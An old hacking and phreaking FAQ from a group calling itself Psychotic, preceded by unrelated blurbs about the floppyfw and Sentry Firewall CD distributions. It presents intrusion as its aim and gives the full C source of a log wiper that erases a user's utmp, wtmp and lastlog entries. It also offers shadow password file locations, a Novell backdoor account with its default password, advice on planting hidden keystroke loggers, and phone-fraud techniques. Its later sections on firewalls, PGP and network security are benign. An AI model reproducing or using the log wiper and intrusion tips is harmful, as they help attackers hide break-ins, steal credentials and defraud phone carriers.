Serial support for console over serial port.
DHCP server and DNS cache for internal networks.

floppyfw

h#tp://www.zelow.no/floppyfw/

Sentry Firewall CD-ROM is a Linux-based bootable CDROM suitable for use as an inexpensive and easy to maintain firewall, server, or IDS(Intrusion Detection System) Node. The system is designed to be immediately configurable for a variety of different operating environments via a configuration file located on a floppy disk, a local hard drive, and/or a network via HTTP(S), FTP, SFTP, or SCP.

The Sentry Firewall CD is a complete Linux system that runs off of an initial ramdisk, much like a floppy-based system, and a CD. The default kernel is a current 2.4.x series kernel with various Netfilter patches applied. An OpenWall-patched current 2.2.x kernel is also available on the CD.

Booting from the CDROM is a fairly familiar process. The BIOS execs the bootloader(Syslinux) - which then displays a bootprompt and loads the kernel and ramdisk into memory. Once the kernel is running, the ramdisk is then mounted as root(/). At this point our configuration scripts are run(written in perl) that configure the rest of the system. It is the job of these configure scripts to put the various startup and system files into the proper location using either what is declared in the configuration file(sentry.conf) or the system defaults located in the /etc/default directory.

Most of the critical files used at boot time can be replaced with your own copy when declared in the configuration file. This is essentially how we allow the user to configure the system using his/her own configuration and init files.

All of the binaries, files, scripts, etc, used to create the CD-ROM are also available on the CD-ROM. So, with a little practice, you can easily build and customize your own bootable Sentry Firewall CD.

Hacking Faq

I. HACKING
* What is hacking?
* How do I crack shadowed passwords?
* How can I tell the difference between an encrypted password and a shadowed password?
* Where can I find the password file if it's shadowed?
* Where is the password file located?
* What is an exploit?
* What are some basic telnet commands?
* How do I get out of the log file?
* What is a DNIC?
* What is an NUA?
* What is a VAX/VMS?
* What is telnet?
* What is an anonymous remailer?
* What is PGP?
* What is a tcp/ip?
* What is a virus?
* What is a trojan?
* What is a worm?
* What do I need to become a hacker?
* What are some common accounts for Novell Netware?
* How can I gain supervisor access to Novell Netware?
* How do I access the passwords for Novell?
* How do I crack a Novell Netware password?
* What are the domain codes?
II. PHREAKING
* What is phreaking?
* How do I start phreaking?
* What are boxes?
* What kind of boxes are there?
* How do I make a box?
* What is a loop?
III.  Security
* How do I set up an anonymous FTP server?
* What are some ways that I can secure a network?
* What is a "rainbow book?"
* What is a sniffer?
* What is a firewall?
* How can I use PGP to benefit me?
IV.  Group Questions
* What is Psychotic?
* Is Psychotic looking for new members?
* What is Psychosis?
* What is the "Devil's Gateway?"
* Where can I find some good resources on hacking and phreaking?
* Who are all the members in Psychotic?
* What are Psychotic's offered services?

Q. What is hacking?

A. Hacking is the art of breaking into computers to gain knowledge that our society has hidden from us. Hacking is illegal and the government spend lots of money each year to have hackers arrested.....when they should be spending the money on more important issues.

Q. What is a shadowed password?

A. A shadowed password is a cover for the real password file. It shows that the real password is hidden somewhere else.

Q. How do I crack shadowed passwords?

A. Cracking a shadowed password file is impossible. Assuming that you got the password file via anonymous ftp. You should try connecting to port 25 and doing the sendmail bug.

Q. What is the difference between an encrypted password and a shadowed password?

A. An encrypted password is just the real password scrambled and changed. It can be cracked with a password cracked and a word file. A shadowed password hides the encrypted password somewhere else other than the etc. dir.

Q.  Where can I find the password file if it's shadowed?

A. Unix                  Path                            Token
-----------------------------------------------------------------
AIX 3                 /etc/security/passwd            !
          or             /tcb/auth/files//
A/UX 3.0s             /tcb/files/auth/?/*
BSD4.3-Reno           /etc/master.passwd              *
ConvexOS 10           /etc/shadpw                     *
ConvexOS 11           /etc/shadow                     *
DG/UX                 /etc/tcb/aa/user/               *
EP/IX                 /etc/shadow                     x
HP-UX                 /.secure/etc/passwd             *
IRIX 5                /etc/shadow                     x
Linux 1.1             /etc/shadow                     *
OSF/1                 /etc/passwd[.dir|.pag]          *
SCO Unix #.2.x        /tcb/auth/files//
SunOS4.1+c2           /etc/security/passwd.adjunct    ##username
SunOS 5.0             /etc/shadow
                                 
System V Release 4.0  /etc/shadow                     x
System V Release 4.2  /etc/security/* database
Ultrix 4              /etc/auth[.dir|.pag]            *
UNICOS                /etc/udb                        *

Q. Where is the password file located?

A. The password file is located in the etc/passwd dir. You can get into the etc dir by logging on to the domain via anonymous ftp.

Q. What is an exploit?

A. An exploit is something that exploits unix or another kind of OS. You usually use exploits to gain root or high access to a system. They can prove to be very handy.

Q. What are some basic telnet commands?

A. Below is a list of common telnet commands.

Command                                                          Function

access                        Telnet account
c                        Connect to a host
cont                        Continue
d                        Disconnect
full                        Network echo
half                        Terminal echo
hangup                        Hangs up
mail                        Mail
set                        Select PAD parameters
stat                        Show network port.
telemail                        Mail

Q.  How do I get out of the log file?

A. Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.
Example:

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"

int f;

void kill_utmp(who)
char *who;
{
    struct utmp utmp_ent;

  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
        while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                          bzero((char *)&utmp_ent,sizeof( utmp_ent ));
                          lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                          write (f, &utmp_ent, sizeof (utmp_ent));
                  }
        close(f);
  }
}

void kill_wtmp(who)
char *who;
{
    struct utmp utmp_ent;
    long pos;

    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {

        while(pos != -1L) {
           lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
           if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
                pos = -1L;
           } else {
                if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
                        bzero((char *)&utmp_ent,sizeof(struct utmp ));
                        lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
                        write (f, &utmp_ent, sizeof (utmp_ent));
                        pos = -1L;
                } else pos += 1L;
           }
        }
        close(f);
  }
}

void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;

        if ((pwd=getpwnam(who))!=NULL) {

           if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
                  lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
                  bzero((char *)&newll,sizeof( newll ));
                  write(f, (char *)&newll, sizeof( newll ));
                  close(f);
           }

    } else printf("%s: ?\n",who);
}

main(argc,argv)
int argc;
char *argv[];
{
    if (argc==2) {
           kill_lastlog(argv[1]);
           kill_wtmp(argv[1]);
           kill_utmp(argv[1]);
           printf("Zap2!\n");
    } else
    printf("Error.\n");
}

Q. What is DNIC?

A. A DNIS says which network connect to the telnet you are using.

Q. What is NUA?

A.  The NUA is the address of the computer on telnet.

Q.  What is a VAX/VMS?

A.  A vax/vms is Digital Equipment's major computer line. It's proprietary operating system is known as vms.

Q.  What is telnet?

A. Telnet is a program which lets you log in to other computers on the net.

Q.  What is an anonymous remailer?

A. An anonymous remailer is a system on the Internet that allows you to send e-mail anonymously or post messages to Usenet anonymously. You apply for an anonymous ID at the remailer site. Then, when you send a message to the remailer, it sends it out from your anonymous ID at the remailer. No one reading the post will know your real account name or host name. If someone sends a message to your anonymous ID, it will be forwarded to your real account by the remailer.

Q.  What is PGP?

A. This FAQ answer is excerpted from:
PGP(tm) User's Guide Volume I: Essential Topics by Philip Zimmermann
PGP(tm) uses public-key encryption to protect E-mail and data files. Communicate securely with
people you've never met, with no secure channels needed for prior exchange of keys. PGP is well
featured and fast, with sophisticated key management, digital signatures, data compression, and
good ergonomic design.
Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a high security cryptographic software application for MS-DOS, Unix, VAX/VMS, and other computers. PGP allows people toexchange files or messages with privacy, authentication, and convenience. Privacy means that only those intended to receive a message can read it. Authentication means that messages that appear to be from a particular person can only have originated from that person. Convenience means that privacy and authentication are provided without the hassles of managing keys associated with conventional cryptographic software. No secure channels are needed to exchange keys between users, which makes PGP much easier to use. This is because PGP is based on a powerful new technology called "public key" cryptography. PGP combines the convenience of the Rivest-Shamir-Adleman (RSA) public key cryptosystem with the speed of conventional cryptography, message digests for digital signatures, data compression before encryption, good ergonomic design, and sophisticated key management. And PGP performs the public-key functions faster than most other software implementations. PGP is public key cryptography for the masses.

Q.  What is tcp/ip?

A. Tcp/ip is the system networks use to communicate with each other. It stands for Transmission Control Protocol/Internet Protocol.

Q. What is a virus?

A.  A Virus is a program which reproduces itself. It may attach itself to other programs, it may create copies of itself. It may damage or corrupt data, change data, or degrade the performance of your system by utilizing resources such as memory or disk space. Some Viruse scanners detect some Viruses. No Virus scanners detect all Viruses. Virus scanners will work for a while but people are always creating virii that will beat them.

Q.  What is a trojan?

A.  A trojan is a program which does an unauthorized function, hidden inside an authorized program. It does something other than it claims to do, usually something malicious, and it is intended by the author to do whatever it does. If it is not intentional, it is called a bug.

Q.  What is a worm?

A.  Worms are programsthat copy themselves over and over using up space and slowing down the system. They are self contained and use the networks to spread, in much the same way that Viruses use files to spread. Some people say the solution to Viruses and worms is to just not have any files or networks.


Q.  What do I need to become a hacker?

A.  You should start off with a good scanner, some dialups, a telnet client, and some knowladge of hacking. Those are the basic things that you will need. If you are serious about hacking then you should get Unix, or Linux(smaller, free version of unix).

Q.  What are some common accounts for Novell Netware?

A.   Below is a list of commonly used accounts for Novell Netware.
       Account         Purpose
        ----------      ------------------------------------------------------
        PRINT           Attaching to a second server for printing
        LASER           Attaching to a second server for printing
        HPLASER         Attaching to a second server for printing
        PRINTER         Attaching to a second server for printing
        LASERWRITER     Attaching to a second server for printing
        POST            Attaching to a second server for email
        MAIL            Attaching to a second server for email
        GATEWAY         Attaching a gateway machine to the server
        GATE            Attaching a gateway machine to the server
        ROUTER          Attaching an email router to the server
        BACKUP          May have password/station restrictions (see below), used
                                 for backing up the server to a tape unit attached to a
                                workstation. For complete backups, Supervisor equivalence
                                 is required.
        WANGTEK         See BACKUP
        FAX             Attaching a dedicated fax modem unit to the network
        FAXUSER         Attaching a dedicated fax modem unit to the network
        FAXWORKS        Attaching a dedicated fax modem unit to the network
        TEST            A test user account for temp use
        ARCHIVIST       Palidrome default account for backup
        CHEY_ARCHSVR    An account for Arcserve to login to the server from   
                        from the console for tape backup. Version 5.01g's
                        password was WONDERLAND. Delete the Station
                        Restrictions and use SUPER.EXE to toggle this
                        account and you have an excellent backdoor.
        WINDOWS_PASSTHRU Although not required, per the Microsoft Win95
                        Resource Kit, Ch. 9 pg. 292 and Ch. 11 pg. 401 you
                        need this for resource sharing without a password.

Q.  How can I gain supervisor access to Novell Netware?

A. Taken from the Novell Netware FAQ.
The secret method is the method of using a DOS-based sector editor to edit the
entry in the FAT, and reset the bindery to default upon server reboot. This gives
you Supervisor and Guest with no passwords. The method was taught in case you
lost Supervisor on a Netware 2.15 server and you had no supe equivalent accounts
created. It also saves the server from a wipe and reboot in case the Supervisor account is corrupt, deleted, or trashed.


Q.  How do I access the password file for Novell?

A. access to the password file in Netware is not like Unix - the password file isn't in the open. All objects and their properties are kept in the bindery files on 2.x and 3.x, and kept in the NDS
database in 4.x. An example of an object might be a printer, a group, an individual's account etc. An example of an object's properties might include an account's password or full user name, or a group's member list or full name. The bindery files attributes (or flags) in 2.x and 3.x are Hidden
and System, and these files are located on the SYS: volume in the SYSTEM subdirectory. Their names are as follows:

        Netware version         File Names
        ---------------         ----------
        2.x                     NET$BIND.SYS, NET$BVAL.SYS
        3.x                     NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

The NET$BVAL.SYS and NET$VAL.SYS are where the passwords are actually located
in 2.x and 3.x respectively.


Q.  How do I crack a Novell password?

A.  Taken from the Novell Netware Hack FAQ.

If Intruder Detection is off, you can use a "brute force" password cracker.

Encrypted passwords is Novell's way of protecting passwords from sniffers.
Since older versions of Netware (2.15c) sent passwords as plain text over the
wire, a sniffer could see the password as it went by. To secure things,
Novell gave the administrator a way to control this. Later versions of the
LOGIN.EXE program would encrypt the password before transmitting it across
the wire to the server. But before this could happen, the shell (NETX) had
to be updated. Since some locations had to have older shells and older
versions of LOGIN.EXE to support older equipment, the administrator has the
option of allowing unencrypted passwords to access the server. This is done
by typing SET ALLOW UNENCRYPTED PASSWORDS=ON at the console or by adding it
to the AUTOEXEC.NCF. The default is OFF, which means NOVELBFH could be beeping
the server console every attempt! Fortunately most sites turn this switch on to
support some old device.

If you have access to the console, either by standing in front of it or by
RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM or SETPWD.NLM to reset passwords.
Just load the NLM and pass it command line parameters:

        NLM             Account(s) reset        Netware version(s) supported
        ------------    -----------------       ----------------------------
        SETSPASS.NLM    SUPERVISOR               3.x
        SETSPWD.NLM     SUPERVISOR              3.x, 4.x
        SETPWD.NLM      any valid account             3.x, 4.x

If you can plant a password catcher or keystroke reader, you can get them
this way. The LOGIN.EXE file is located in the SYS:LOGIN directory, and
normally you will not have access to put a file in that directory. The best
place to put a keystroke capture program is in the workstation's path, with
the ATTRIB set as hidden. The advantage is that you'll get the password and
Netware won't know you swiped it. The disadvantage is getting access to the
machine to do this. The very best place to put one of these capture programs
is on a common machine, like a pcAnywhere box, which is used for remote access.
Many locations will allow pcAnywhere access to a machine with virtually no
software on it, and control security access to the LAN by using Netware's
security features. Uploading a keystroke capture program to a machine like
this defeats this.

Q.  What are the domain codes?

A. Below is the current list of domain codes.
AD   Andorra
AE   United Arab Emirates
AF   Afghanistan
AG   Antigua and Barbuda
AI   Anguilla
AL   Albania
AM   Armenia
AN   Netherland Antilles
AO   Angola
AQ   Antarctica
AR   Argentina
AS   American Samoa
AT   Austria
AU   Australia
AW   Aruba
AZ   Azerbaidjan
BA   Bosnia-Herzegovina
BB   Barbados
BD   Banglades
BE   Belgium
BF   Burkina Faso
BG   Bulgaria
BH   Bahrain
BI   Burundi
BJ   Benin
BM   Bermuda
BN   Brunei Darussalam
BO   Bolivia
BR   Brazil
BS   Bahamas
BT   Buthan
BV   Bouvet Island
BW   Botswana
BY   Belarus
BZ   Belize
CA   Canada
CC   Cocos (Keeling) Islands
CF   Central African Republic
CG   Congo
CH   Switzerland
CI   Ivory Coast
CK   Cook Islands
CL   Chile
CM   Cameroon
CN   China
CO   Colombia
CR   Costa Rica
CS   Czechoslovakia
CU   Cuba
CV   Cape Verde
CX   Christmas Island
CY   Cyprus
CZ   Czech Republic
DE   Germany
DJ   Djibouti
DK   Denmark
DM   Dominica
DO   Dominican Republic
DZ   Algeria
EC   Ecuador
EE   Estonia
EG   Egypt
EH   Western Sahara
ES   Spain
ET   Ethiopia
FI   Finland
FJ   Fiji
FK   Falkland Islands (Malvinas)
FM   Micronesia
FO   Faroe Islands
FR   France
FX   France (European Territory)
GA   Gabon
GB   Great Britain (UK)
GD   Grenada
GE   Georgia
GH   Ghana
GI   Gibraltar
GL   Greenland
GP   Guadeloupe (French)
GQ   Equatorial Guinea
GF   Guyana (French)
GM   Gambia
GN   Guinea
GR   Greece
GT   Guatemala
GU   Guam (US)
GW   Guinea Bissau
GY   Guyana
HK   Hong Kong
HM   Heard and McDonald Islands
HN   Honduras
HR   Croatia
HT   Haiti
HU   Hungary
ID   Indonesia
IE   Ireland
IL   Israel
IN   India
IO   British Indian Ocean Territory
IQ   Iraq
IR   Iran
IS   Iceland
IT   Italy
JM   Jamaica
JO   Jordan
JP   Japan
KE   Kenya
KG   Kirgistan
KH   Cambodia
KI   Kiribati
KM   Comoros
KN   Saint Kitts Nevis Anguilla
KP   North Korea
KR   South Korea
KW   Kuwait
KY   Cayman Islands
KZ   Kazachstan
LA   Laos
LB   Lebanon
LC   Saint Lucia
LI   Liechtenstein
LK   Sri Lanka
LR   Liberia
LS   Lesotho
LT   Lithuania
LU   Luxembourg
LV   Latvia
LY   Libya
MA   Morocco
MC   Monaco
MD   Moldavia
MG   Madagascar
MH   Marshall Islands
ML   Mali
MM   Myanmar
MN   Mongolia
MO   Macau
MP   Northern Mariana Islands
MQ   Martinique (French)
MR   Mauritania
MS   Montserrat
MT   Malta
MU   Mauritius
MV   Maldives
MW   Malawi
MX   Mexico
MY   Malaysia
MZ   Mozambique
NA   Namibia
NC   New Caledonia (French)
NE   Niger
NF   Norfolk Island
NG   Nigeria
NI   Nicaragua
NL   Netherlands
NO   Norway
NP   Nepal
NR   Nauru
NT   Neutral Zone
NU   Niue
NZ   New Zealand
OM   Oman
PA   Panama
PE   Peru
PF   Polynesia (French)
PG   Papua New
PH   Philippines
PK   Pakistan
PL   Poland
PM   Saint Pierre and Miquelon
PN   Pitcairn
PT   Portugal
PR   Puerto Rico (US)
PW   Palau
PY   Paraguay
QA   Qatar
RE   Reunion (French)
RO   Romania
RU   Russian Federation
RW   Rwanda
SA   Saudi Arabia
SB   Solomon Islands
SC   Seychelles
SD   Sudan
SE   Sweden
SG   Singapore
SH   Saint Helena
SI   Slovenia
SJ   Svalbard and Jan Mayen Islands
SK   Slovak Republic
SL   Sierra Leone
SM   San Marino
SN   Senegal
SO   Somalia
SR   Suriname
ST   Saint Tome and Principe
SU   Soviet Union
SV   El Salvador
SY   Syria
SZ   Swaziland
TC   Turks and Caicos Islands
TD   Chad
TF   French Southern Territory
TG   Togo
TH   Thailand
TJ   Tadjikistan
TK   Tokelau
TM   Turkmenistan
TN   Tunisia
TO   Tonga
TP   East Timor
TR   Turkey
TT   Trinidad and Tobago
TV   Tuvalu
TW   Taiwan
TZ   Tanzania
UA   Ukraine
UG   Uganda
UK   United Kingdom
UM   US Minor Outlying Islands
US   United States
UY   Uruguay
UZ   Uzbekistan
VA   Vatican City State
VC   Saint Vincent and Grenadines
VE   Venezuela
VG   Virgin Islands (British)
VI   Virgin Islands (US)
VN   Vietnam
VU   Vanuatu
WF   Wallis and Futuna Islands
WS   Samoa
YE   Yemen
YU   Yugoslavia
ZA   South Africa
ZM   Zambia
ZR   Zaire
ZW   Zimbabwe
ARPA   Old style Arpanet
COM   US Commercial
EDU   US Educational
GOV   US Government
INT   International
MIL   US Military
NATO   Nato field
NET   Network
ORG   Non-Profit



Q.  What is phreaking?

A. Phreaking is anything illegal that has to do with phones and phone lines.

Q.  How do I start phreaking?

A. You should start by learning about boxes and reading up on different types of phreaking.

Q. What kind of boxes are there?

A.Below is a list of the most common boxes and what they do.

Acrylic Box - Steal Three-Way-Calling and Call Waiting.
Aero Box - Make free fone calls from Payfones.
Aqua Box - Drain voltage from a FBI Lock In Trace call.
Beige Box - Replicates a line mens hand-set.
Black Box - Allows the calling party not to get charged for the call they place.
Blast Box - Fone Microphone Amplifier.
Blotto Box - Shorts every fone out in the area.
Blue Box - Utilizing 2600Hz tones for free fone calls.
Brown Box - Creates a party line from 2 existing fone lines.
Bud Box - Used to tap into your neighbors fone line.
Busy Box - Used to kill the dial tone on someone's fone.
Chartreuse Box - Use the electricty from your phone for other things.
Cheese Box - Turns your fone into a Payfone.
Chrome Box - Lets you manipulate traffic signals via remote control.
Clear Box - Used to make free calls on Fortress Fones.
Copper Box - Causes cross-talk interference on an extender.
Crimson Box - Acts as a 'Hold' button for your fone.
Dark Box - REroutes outgoing or incomming calls to another fone.
Dayglo Box - Allows you to connect to your neighbors fone line.
Ditto Box - Allows you to evesdrop on another fone line.
Divertor Box - REroutes outgoing or incomming calls to another fone.
DLOC Box - Lets you confrence 2 fone lines (other than your own).
Gold Box - Allows you to trace a call or tell if its being traced.
Green Box - Lets you make the Coin Collect, Coin Return, and Ringback tones.
Jack Box - A touch-tone keypad.
Light Box - An AM Transmitter.
Lunch Box - Used to tap into your neighbors fone line.
Magenta Box - Connects one remote fone line to another remote fone line.
Mauve Box - Lets you fone tap without cutting into the fone line.
Neon Box - An external microphone.
New Gold Box - A new updated version of the Gold Box.
Noise Box - Creates line noise.
Olive Box - Used as an external ringer.
Paisley Box - A combination of almost all the boxes there are.
Pandora Box - Creates a high intensity tone which can cause pain. Good for pranking.
Party Box - Lets you make a party line from 2 fone lines.
Pearl Box - A tone generator.
Pink Box - Lets you hook 2 seprate fone lines together and have 3 way calling.
Purple Box - A fone hold button.
Rainbow Box - Kills a trace by putting 120v into the fone line.
BoRed x - Lets you make free calls from a payfone by producing the coins tones.
Rock Box - Adds music to your fone line.
Scarlet Box - Silver Box - Adds DTMF A, B, C, & D priority tones to your line.
Slush Box - Can be installed at places of business that have standard multi-line fones.
Static Box - Keep voltage on a fone line high.
Switch Box - Adds hold, indicator lights, confrence, etc.
Tan Box - Line activated telefone recorder.
Tron Box - Reverse the phase of power to your house, and make your meter run slower.
Urine Box - Makes a disturbance between the ring and tip wires in someones fone.
Violet Box - Keeps a payfone from hanging up.
White Box - A portable DTMF keypad.
Yellow Box - Add an extention fone.

Q.  How do I make a box?

A.  Each box has a sepperate plan to set it up. Just do a netsearch for phreaking or boxes and you can find all the plans you need.

Q.  What is a loop?

A. This FAQ answer is excerpted from:
ToneLoc v0.99 User Manual by Minor Threat & Mucho Maas
Loops are a pair of phone numbers, usually consecutive, like 836-9998 and 836-9999. They are
used by the phone company for testing. What good do loops do us? Well, they are cool in a few
ways. Here is a simple use of loops. Each loop has two ends, a 'high' end, and a 'low' end. One end
gives a (usually) constant, loud tone when it is called. The other end is silent. Loops don't usually
ring either. When BOTH ends are called, the people that called each end can talk through the loop.
Some loops are voice filtered and won't pass anything but a constant tone; these aren't much use to
you. Here's what you can use working loops for: billing phone calls! First, call the end that gives the loud tone. Then if the operator or someone calls the other end, the tone will go quiet. Act like the phone just rang and you answered it ... say "Hello", "Allo", "Chow", "Yo", or what the fuck ever. The operator thinks that she just called you, and that's it! Now the phone bill will go to the loop, and your local RBOC will get the bill! Use this technique in moderation, or the loop may go down. Loops are probably most useful when you want to talk to someone to whom you don't want to give your phone number.

Q.  How do I set up an anonymous FTP?

A. Taken from the Internet Security Systems, Inc. text on setting up an anonymous ftp.
- 1.Build a statically linked version of ftpd and put it in ~ftp/bin. Make sure it's owned by root.
     - 2.Build a statically linked version of /bin/ls if you'll need one. Put it in ~ftp/bin. If you are on a Sun, and need to build one, there's a ported version of the BSD net2 ls command for SunOs
     on ftp.tis.com: pub/firewalls/toolkit/patches/ls.tar.Z Make sure it's owned by root.
     - 3.Chown ~ftp to root and make it mode 755 THIS IS VERY IMPORTANT
    -  4.Set up copies of ~ftp/etc/passwd and ~ftp/etc/group just as you would normally, EXCEPT
     make 'ftp's home directory '/' -- make sure they are owned by root.
    -  5.Write a wrapper to kick ftpd off and install it in /etc/inetd.conf The wrapper should look
     something like: (assuming ~ftp = /var/ftp)
     main()

     {

     if(chdir("/var/ftp")) {

             perror("chdir /var/ftp");

             exit(1);

     }

     if(chroot("/var/ftp")) {

             perror("chroot /var/ftp");

             exit(1);

     }

     /* optional: seteuid(FTPUID); */

     execl("/bin/ftpd","ftpd","-l",(char *)0);

     perror("exec /bin/ftpd");

     exit(1);

     }
     Options:
     You can use 'netacl' from the toolkit or tcp_wrappers to achieve the same effect.
     We use 'netacl' to switch so that a few machines that connect to the FTP service *don't* get
     chrooted first. This makes transferring files a bit less painful.
     You may also wish to take your ftpd sources and find all the places where it calls seteuid()
     and remove them, then have the wrapper do a setuid(ftp) right before the exec. This means
     that if someone knows a hole that makes them "root" they still won't be. Relax and imagine
     how frustrated they will be.
     If you're hacking ftpd sources, I suggest you turn off a bunch of the options in ftpcmd.y by
     unsetting the "implemented" flag in ftpcmd.y. This is only practical if your FTP area is
     read-only.
-   6.As usual, make a pass through the FTP area and make sure that the files are in correct modes
     and that there's nothing else in there that can be executed.
-   7.Note, now, that your FTP area's /etc/passwd is totally separated from your real /etc/passwd.
     This has advantages and disadvantages.
-    8.Some stuff may break, like syslog, since there is no /dev/log. Either build a version of ftpd
     with a UDP-based syslog() routine or run a second syslogd based on the BSD Net2 code,
     that maintains a unix-domain socket named ~ftp/dev/log with the -p flag.

Q.  What are some ways I can secure a network?

A.  Taken from the Internet Security Systems text on securing a network.
1. Well first of all you should know what type of resources that you're trying to protect: CPU, files, storage devices phone lines, etc...
 2. Determine the host-specific security measures needed. Password protection, file
encryption, firewall, etc...
     Determine who the computer systems must be defended.
     Determine the likelihood of a threat.
     Implement measures to protect network resource.

3. Consider the corporate budget when planning for Internet Security.

4. Design a Security Policy that describes your organization's network security
concerns. This policy should take into account the following:

     Network Security Planning
     Site Security Policy
     Risk Analysis
     Risk analysis involves determining the following:
          What you need to protect
          What you need to protect it from
          How to protect it
          Estimating the risk of losing the resource
          Estimating the importance of the resource

5. Consider the following factors to determine who will grant access to services on your
networks:
     Will access to services be granted from a central point?
     What methods will you use to create accounts and terminate access?

6. Design and Implement Packet Filter Rules

7. Ensure your Firewall has the following properties:
     All traffic from inside to outside, as well as outside to inside must pass through the
     firewall.
     Allow only authorized traffic as defined by your corporate security policy be
     passed through the firewall.
     Ensure the firewall is immune to penetration.

8. Educate users about password protection:
     Educating users not to use passwords that are easy to guess.
     Ensuring the password lengths are adequate.
     Running a password guesser.
     Requiring the use of a password generator.
     Always using a mixture of upper- and lowercase characters.
     Always using at least one or two non-alphanumeric characters.
     Never using dictionary words or ones spelled backwards.
     Never using a portion or variation of a proper name, address or anything that
     could obviously identify you (the user).

9. Security-related organizations play an integral role in the development and
deployment of Internet technologies. Keep abreast of the latest in security-related
activities by visiting their Web sites. Here are some key security-rated organizations
which aid corporations such as yours in keeping the Internet a safer place to compute:
     ACM/SIGSAC at gopher://gopher.acm.org/.
     CERT (a 24-hour Computer Emergency Response Team) at:
     ftp://info.cert.org/pub/cert_faq and
     http://www.sei.cmu.edu/SEI/programs/cert.html.
     CIAC (U.S. Department of Energy's Computer Incident Advisory
     Capability) at: http://ciac.llnl.gov/
     CPSR (Computer Professionals for Social Responsibility) at:
     http://cpsr.org.home
     EFF (Electronic Frontier Foundation) at: http://www.eff.org/
     EPIC (Electronic Privacy Information Center) at: http:/epic.org/
     FIRST (Forum of Incident Reponse and Security Teams) at:
     http://first.org/first/
     Internet Society at http://www.isoc.org/

Q.  What is a "rainbow book?"

A.  Rainbow Books are books on security. The current book listing is listed below.

Orange Book- Department of Defense Trusted Computer System Evaluation Criteria.
Green Book- Department of Defense Password Management Guideline.
Yellow Book- Guidance for Applying the Department of Defense Trusted Computer System Evaluation Criteria in Specific Environments.
Tan Book- A Guide to Understanding Audit in Trusted Systems.
Bright Blue Book- A Guide for Vendors.
Neon Orange Book- A Guide to Understanding Discretionary Access Control in Trusted Systems.
Teal Green Book-  Glossary of Computer Security Terms.
Red Book- Trusted Network Interpretation of the Trusted Computer System Evaluation Criteria.
Burgandy Book- A Guide to Understanding Design Documentation in Trusted Systems.
Dark Lavender Book- A Guide to Understanding Trusted Distribution in Trusted Systems.
Venice Blue Book- Computer Security Subsystem Interpretation of the Trusted Computer System Evaluation Criteria.
Aqua Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Security Modeling in Trusted Systems.
Dark Red Book- Guidance for Applying the Trusted Network Interpretation.
Pink Book- Department of Defense Trusted Computer System Evaluation Criteria Rating Maintenance Phase.
Purple Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Formal Verification Systems.
Brown Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Trusted Facility Management.
Yellow-Green Book- Department of Defense Trusted Computer System Evaluation Criteria Guidelines for Writing Trusted Facility Manuals.
Light Blue Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Identification and Authentication in Trusted Systems.
Blue Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Product Evaluation Questionnaire.
Grey Book-Department of Defense Trusted Computer System Evaluation Criteria Trusted Unix Working Group (TRUSIX) Rationale for Selecting Access Control List Features for the Unix System.
Lavender Book- Department of Defense Trusted Computer System Evaluation Criteria Trusted Data Base Management System Interpretation of the Trusted Computer System Evaluation Criteria.
Bright Orange Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understandng Security Testing and Test Documentation in Trusted Systems.
Hot Peach Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Writing the Security Features User's Guide for Trusted Systems.
Turquoise Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Information System Security Officer Responsibilities for Automated Information Systems.
Violet Book- Department of Defense Trusted Computer System Evaluation Criteria Assessing Controlled Access Protection.
Light Pink Book- Department of Defense Trusted Computer System Evaluation Criteria A Guide to Understanding Covert Channel Analysis of Trusted Systems.
C1 Technical Report-001- Department of Defense Trusted Computer System Evaluation Criteria Computer Viruses: Prevention, Detection, and Treatment.
C Technical Report 79-91- Department of Defense Trusted Computer System Evaluation Criteria Integrity in Automated Information Systems.
C Technical Report 39-92-  Department of Defense Trusted Computer System Evaluation Criteria The Design and Evaluation of INFOSEC systems: The Computer Security Contributions to the Composition Discussion.
NTISSAM COMPUSEC/1-87- Department of Defense Trusted Computer System Evaluation Criteria Advisory Memorandum on Office Automation Security Guideline.



Q.  What is a firewall?

A. A firewall is a system or group of systems that enforces an access control policy between two networks. The actual means by which this is accomplished varies widely, but in principle, the firewall can be thought of as a pair of mechanisms: one which exists to block traffic, and the other which exists to permit traffic. Some firewalls place a greater emphasis on blocking traffic, while others emphasize permitting traffic. Probably the most important thing to recognize about a firewall is that it implements an access control policy. If you don't have a good idea what kind of access you want to permit or deny, or you simply permit someone or some product to configure a
firewall based on what they or it think it should do, then they are making policy for your organization as a whole.

Q.  How can I use PGP to benefit me?

A. PGP is easy to use, it does give you enough rope so that you can hang yourself. You should
become thoroughly familiar with the various options in PGP before using it to send serious
messages. For example, giving the command pgp -sat will only sign a message, it
will not encrypt it. Even though the output looks like it is encrypted, it really isn't. Anybody in the
world would be able to recover the original text.

Q.  What is a sniffer?

A.  Taken from the Sniffer FAQ.
Unlike telephone circuits, computer networks are shared communication channels. It is simply too expensive to dedicate local loops to the switch (hub) for each pair of communicating computers. Sharing means that computers can receive information that was intended for other machines. To capture the information going over the network is called sniffing.

